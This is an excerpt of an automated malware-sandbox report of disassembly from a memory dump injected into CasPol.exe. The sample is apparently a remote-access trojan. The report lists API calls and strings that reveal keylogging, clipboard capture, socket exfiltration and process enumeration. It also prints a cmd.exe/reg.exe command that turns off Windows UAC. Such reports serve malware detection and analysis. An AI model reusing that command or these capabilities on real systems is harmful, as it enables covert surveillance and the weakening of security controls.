  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
• String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
APIs
• GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
• wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: EventLocalTimewsprintf
• String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                              • API String ID: 1497725170-248792730
                                                                                                              • Opcode ID: d0a762379af5fb0e207909ff998a5ffb5b5a0fca7ae3eecf9d37432640f3a21d
                                                                                                              • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                                              • Opcode Fuzzy Hash: d0a762379af5fb0e207909ff998a5ffb5b5a0fca7ae3eecf9d37432640f3a21d
                                                                                                              • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9

APIs
• CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00409DCD
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
• Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
• CloseHandle.KERNEL32(00000000), ref: 00409E10
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Similarity
• API ID: File$CloseCreateHandleSizeSleep
• String ID: `AG
• API String ID: 1958988193-3058481221
• Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
• Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
• Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
• Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D

Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Similarity
• API ID: ClassCreateErrorLastRegisterWindow
• String ID: 0$MsgWindowClass
• API String ID: 2877667751-2410386613
• Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
• Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
• Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
• Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5

APIs
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
• CloseHandle.KERNEL32(?), ref: 00406A0F
• CloseHandle.KERNEL32(?), ref: 00406A14
Strings
• C:\Windows\System32\cmd.exe, xrefs: 004069FB
• /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
• API String ID: 2922976086-4183131282
• Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
• Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
• Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
• Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9

APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 004425F9
• GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044258A,?,?,0044252A,?), ref: 0044260C
• FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 0044262F
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
• Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
• Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
• Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C

APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,0040483F,00000001,?,?,00000000,00475B70,004017F3), ref: 00404AED
• SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404AF9
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404B04
• CloseHandle.KERNEL32(?), ref: 00404B0D
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Similarity
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: KeepAlive | Disabled
• API String ID: 2993684571-305739064
• Opcode ID: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
• Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
• Opcode Fuzzy Hash: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
• Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B

APIs
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
• PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
• Sleep.KERNEL32(00002710), ref: 00419F79
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered
• API String ID: 614609389-2816303416
• Opcode ID: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
• Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
• Opcode Fuzzy Hash: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
• Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB

APIs
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
• GetConsoleScreenBufferInfo.KERNEL32 ref: 0041BE86
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041BE93
• SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041BEA6
Strings
• ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Similarity
• API ID: Console$AttributeText$BufferHandleInfoScreen
• String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
• API String ID: 3024135584-2418719853
• Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
• Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
• Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
• Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79

Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Similarity
• Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
• Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
• Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
• Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9

APIs
  • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
• GetNativeSystemInfo.KERNEL32(?), ref: 00410BC4
• GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
• HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
• SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
• SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Similarity
• API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
• API String ID: 3525466593-0
• Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
• Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
• Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
• Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99

APIs
  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
• Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
• CloseHandle.KERNEL32(00000000), ref: 0040E8AB
  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Similarity
• API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• API String ID: 4269425633-0
• Opcode ID: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
• Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
• Opcode Fuzzy Hash: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
• Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID:
                                                                                                              • API String ID: 269201875-0
                                                                                                              • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                              • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                                              • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                              • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53), ref: 0044FF20
                                                                                                              • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?), ref: 0044FFA9
                                                                                                              • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?,00000002,?), ref: 0044FFBB
                                                                                                              • __freea.LIBCMT ref: 0044FFC4
                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                              • String ID:
                                                                                                              • API String ID: 313313983-0
                                                                                                              • Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                                                                              • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                              • Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                                                                              • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                              APIs
                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                              • _free.LIBCMT ref: 0044E1A0
                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 336800556-0
                                                                                                              • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                                                                              • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                              • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                                                                              • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 0044F7B5
                                                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000), ref: 00446ADB
                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                              • _free.LIBCMT ref: 0044F7C7
                                                                                                              • _free.LIBCMT ref: 0044F7D9
                                                                                                              • _free.LIBCMT ref: 0044F7EB
                                                                                                              • _free.LIBCMT ref: 0044F7FD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                              • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                              • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                              • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 00443305
                                                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000), ref: 00446ADB
                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                              • _free.LIBCMT ref: 00443317
                                                                                                              • _free.LIBCMT ref: 0044332A
                                                                                                              • _free.LIBCMT ref: 0044333B
                                                                                                              • _free.LIBCMT ref: 0044334C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                              • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                              • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                              • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                                              APIs
                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                              • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                              • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                              • String ID: (FG
                                                                                                              • API String ID: 3142014140-2273637114
                                                                                                              • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                                                                              • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                              • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                                                                              • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                              APIs
                                                                                                              • _strpbrk.LIBCMT ref: 0044D4A8
                                                                                                              • _free.LIBCMT ref: 0044D5C5
                                                                                                                • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043A856
                                                                                                                • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A878
                                                                                                                • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                              • String ID: *?$.
                                                                                                              • API String ID: 2812119850-3972193922
                                                                                                              • Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                                                                              • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                                                                              • Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                                                                              • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                                                                              APIs
                                                                                                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041B6BF
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                              • String ID: XCG$`AG$>G
                                                                                                              • API String ID: 2334542088-2372832151
                                                                                                              • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                                                                              • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                              • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                                                                              • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                              APIs
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442714
                                                                                                              • _free.LIBCMT ref: 004427DF
                                                                                                              • _free.LIBCMT ref: 004427E9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$FileModuleName
                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                              • API String ID: 2506810119-3657627342
                                                                                                              • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                                              • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                              • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                                              • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9), ref: 004176CC
  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF), ref: 004176D5
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041B633
• Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
• String ID: /sort "Visit Time" /stext "$8>G
• API String ID: 368326130-2663660666
• Opcode ID: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
• Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
• Opcode Fuzzy Hash: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
• Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99

APIs
• CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
• CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
• CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
